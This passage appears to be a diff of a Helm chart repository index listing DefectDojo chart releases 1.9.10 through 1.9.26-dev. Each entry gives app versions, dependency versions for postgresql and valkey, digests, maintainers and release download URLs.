+ - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: cc5548f2fc55c4d3aea6fd9b45c0a032f13382f81013f5177e4161e440508b70 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.26-dev.tgz + version: 1.9.26-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.58.0 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.58.0 + created: "2026-05-04T17:18:09.915168421Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 69758c0a650844b468c1902ed28a24f818e49ad9b8791b027371a1083040c9f8 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.58.0/defectdojo-1.9.25.tgz + version: 1.9.25 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.58.0-dev + created: "2026-05-04T06:05:11.316775904Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: bfbbc98426f054c69619566790799f2c8023e140f6fb33f703433ad4d84755cd + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.25-dev.tgz + version: 1.9.25-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.57.3 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.57.3 + created: "2026-04-27T15:39:33.915953677Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.18.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e448ee51a0fe9cd5711020825afb63ea94cfdfd4d48e36818a0185a73baf8eda + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.57.3/defectdojo-1.9.24.tgz + version: 1.9.24 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.18.0 to v0.19.0 (_/defect_/Chart.yaml) + - kind: changed + description: Update valkey Docker tag from 0.19.0 to v0.20.0 (_/defect_/Chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.58.0-dev + created: "2026-04-27T06:03:23.090278682Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.20.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 37ecc32aaf6e193114f24bbd48fb3d3d78d8c3a4288c547c518fdda1ed25897c + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.24-dev.tgz + version: 1.9.24-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.57.2 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.57.2 + created: "2026-04-20T15:21:28.886727129Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.18.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c94fa69d17bd72d25552769e67e5b8354dfc1185144c4e300bb012e8d7fa9d5f + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.57.2/defectdojo-1.9.23.tgz + version: 1.9.23 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.18.0 to v0.19.0 (_/defect_/Chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.58.0-dev + created: "2026-04-21T05:50:56.75129228Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.19.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0f9147892a7b92b34253e224e13d0e526ac15571e03601757e364029550a9734 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.23-dev.tgz + version: 1.9.23-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.57.1 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.57.1 + created: "2026-04-13T16:00:31.984631392Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.18.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: dd7ea873d7019d38d0ebb9300ec9f6295eaf2435ae190b9571c9b5b2797db6ea + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.57.1/defectdojo-1.9.22.tgz + version: 1.9.22 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.58.0-dev + created: "2026-04-13T05:55:48.800365041Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.18.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 9ed0bd1bad7aec478e8a898e89dbc397b33f088ff06a094671be342929be1a94 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.22-dev.tgz + version: 1.9.22-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.57.0 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.57.0 + created: "2026-04-06T18:13:16.538955907Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.18.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c9e5c15be4529a5dd399105446c311d7de155dc3922533df7952bfa01e2837bb + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.57.0/defectdojo-1.9.21.tgz + version: 1.9.21 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.57.0-dev + created: "2026-04-06T05:46:07.765956724Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.18.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 99c1a969167085aec6404169a5bf9b88d9e32dfb9848c9c297dd25a0cf092578 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.21-dev.tgz + version: 1.9.21-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.56.4 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.56.4 + created: "2026-03-30T15:23:43.864416318Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.17.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e1ecacffd6d6c8d06c328bef32fcfa9a54044e2b3dab69bdf2f8d3b5d6a5a1b4 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.56.4/defectdojo-1.9.20.tgz + version: 1.9.20 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: chore(deps)_ update valkey _ tag from 0.17.0 to v0.17.1 (_/defect_/chart.yaml) + - kind: changed + description: chore(deps)_ update valkey _ tag from 0.17.1 to v0.18.0 (_/defect_/chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.57.0-dev + created: "2026-03-30T05:46:13.502115123Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.18.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 73fce6585bd3bd60d5b52d1e47bb18fdfe9f6ae75a73d07db26701a0ab0b3dd7 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.20-dev.tgz + version: 1.9.20-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.56.3 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.56.3 + created: "2026-03-23T15:53:40.624481037Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.17.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1b4cecd0e97fc7153ae7c924a4fe4530d77c0146dcb079fe1f09f858a94b95d4 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.56.3/defectdojo-1.9.19.tgz + version: 1.9.19 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: chore(deps)_ update valkey _ tag from 0.17.0 to v0.17.1 (_/defect_/chart.yaml) + - kind: changed + description: chore(deps)_ update valkey _ tag from 0.17.1 to v0.18.0 (_/defect_/chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.57.0-dev + created: "2026-03-24T05:37:51.097119502Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.18.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 28367f1c524a20d50db31a15341855a4ecea5a4af721312529c3c82db669ba8c + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.19-dev.tgz + version: 1.9.19-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.56.2 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.56.2 + created: "2026-03-16T15:57:46.90614769Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.17.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: fcddb5673efcd38e5d709a064cedaec7587e1c8010bb1fc43f8dd3020b55c1ed + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.56.2/defectdojo-1.9.18.tgz + version: 1.9.18 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: chore(deps)_ update valkey _ tag from 0.17.0 to v0.17.1 (_/defect_/chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.57.0-dev + created: "2026-03-16T05:40:41.791456973Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.17.1 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c5f95b0f5fd5864e23530d75fe690b1ecd022cba6f2ec6b1a8ea2d6b09260c2d + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.18-dev.tgz + version: 1.9.18-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.56.1 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.56.1 + created: "2026-03-09T17:45:22.573578435Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.17.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: da2b0f6db4d869c0b35d29db41fe6437eae4b36509d933d0bc0551b0918e3658 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.56.1/defectdojo-1.9.17.tgz + version: 1.9.17 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.56.1 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.56.1 + created: "2026-03-09T14:09:02.823455626Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.17.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 5210d2d70855b8bebd0534fdb160bf7c4ef6f0792a69e8378206cc1586c313a0 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.56.1/defectdojo-1.9.16.tgz + version: 1.9.16 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.57.0-dev + created: "2026-03-09T05:30:08.499419145Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.17.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 42047afac7b681be3520910f3792455667510b13d1fcc457ede0bade846ebaa7 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.16-dev.tgz + version: 1.9.16-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.56.0 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.56.0 + created: "2026-03-02T19:04:26.590357932Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.17.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8377ebd0a8f99d4731deb8b81b90544815b63dc030b582897aea47ccb1c1f4f2 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.56.0/defectdojo-1.9.15.tgz + version: 1.9.15 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.56.0-dev + created: "2026-03-02T05:31:58.233790496Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.17.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 68a5c6d911ba3603160c3bd202274cb6a75f6aa236c58e26dee27dff2594719c + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.15-dev.tgz + version: 1.9.15-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.55.4 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.55.4 + created: "2026-02-23T17:00:52.40080756Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.15.3 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8695efacfa75fb930774032041ac85ac7be53e6b0893a8db142d7a732760e3d7 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.55.4/defectdojo-1.9.14.tgz + version: 1.9.14 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.15.3 to v0.15.4 (_/defect_/Chart.yaml) + - kind: changed + description: Update valkey Docker tag from 0.15.4 to v0.17.0 (_/defect_/Chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.56.0-dev + created: "2026-02-23T05:34:17.886832409Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.17.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1e895ff8e271f769f98aa82998f14e728127ac7fc6b7601487699a4849964c2d + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.14-dev.tgz + version: 1.9.14-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.55.3 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.55.3 + created: "2026-02-21T19:32:05.899554863Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.15.3 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 49a9d5c3d88ce3bc4f06b52feef6138addaf68ccf7f808c83b80b8908f46e3e4 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.55.3/defectdojo-1.9.13.tgz + version: 1.9.13 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.15.3 to v0.15.4 (_/defect_/Chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.56.0-dev + created: "2026-02-17T05:36:42.433136161Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.15.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 6df950451186dbe10ed0dbf6d4ddf3151a8a2e0db460304267e5b96391d787e6 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.13-dev.tgz + version: 1.9.13-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.55.2 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.55.2 + created: "2026-02-09T18:43:56.718298455Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.15.3 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 82477c5bb9a8f212d7dc5b911abce1460e0ec60056bf78aeb023ff48c8c1b8ed + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.55.2/defectdojo-1.9.12.tgz + version: 1.9.12 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.56.0-dev + created: "2026-02-09T05:35:02.51451621Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.15.3 + description: A Helm chart for Kubernetes to install DefectDojo + digest: afeda39004f8d6df260e78e23466a98626535901613c91bb385e4cd162fe782b + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.12-dev.tgz + version: 1.9.12-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.55.1 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.55.1 + created: "2026-02-05T00:06:37.12567817Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.15.3 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 161c10d5f89493c4cc6134e61b01e9a36d3f68386c751ffef0c08fea88c5c231 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.55.1/defectdojo-1.9.11.tgz + version: 1.9.11 + - annotations: + artifacthub.io/changes: | + - kind: added + description: Valkey - use dedicated service account + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.56.0-dev + created: "2026-02-04T05:28:33.418724058Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.15.3 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8a0d4d81e45bb9c9b32500420ced8945a345b1920f6c07d1c3397447bbd225c5 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.11-dev.tgz + version: 1.9.11-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.13.0 to v0.15.0 (_/defect_/Chart.yaml) + - kind: changed + description: chore(deps)_ update valkey _ tag from 0.15.0 to v0.15.1 (_/defect_/chart.yaml) + - kind: changed + description: chore(deps)_ update gcr.io/cloudsql__/gce_proxy _ tag from 1.37.11 to v1.37.12 (_/defect_/values.yaml) + - kind: changed + description: Update valkey Docker tag from 0.15.1 to v0.15.2 (_/defect_/Chart.yaml) + - kind: changed + description: Update valkey Docker tag from 0.15.2 to v0.15.3 (_/defect_/Chart.yaml) + - kind: changed + description: Bump DefectDojo to 2.55.0 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.55.0 + created: "2026-02-03T00:09:08.42689504Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.15.3 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 2d56eb2f03636ce82dc746c2cacf19e27bbda914df6a681ca1d3478566b2acdb + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.55.0/defectdojo-1.9.10.tgz + version: 1.9.10 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.13.0 to v0.15.0 (_/defect_/Chart.yaml) + - kind: changed + description: chore(deps)_ update valkey _ tag from 0.15.0 to v0.15.1 (_/defect_/chart.yaml) + - kind: changed + description: chore(deps)_ update gcr.io/cloudsql__/gce_proxy _ tag from 1.37.11 to v1.37.12 (_/defect_/values.yaml) + - kind: changed + description: Update valkey Docker tag from 0.15.1 to v0.15.2 (_/defect_/Chart.yaml) + - kind: changed + description: Update valkey Docker tag from 0.15.2 to v0.15.3 (_/defect_/Chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.55.0-dev + created: "2026-02-02T05:34:18.615127311Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + 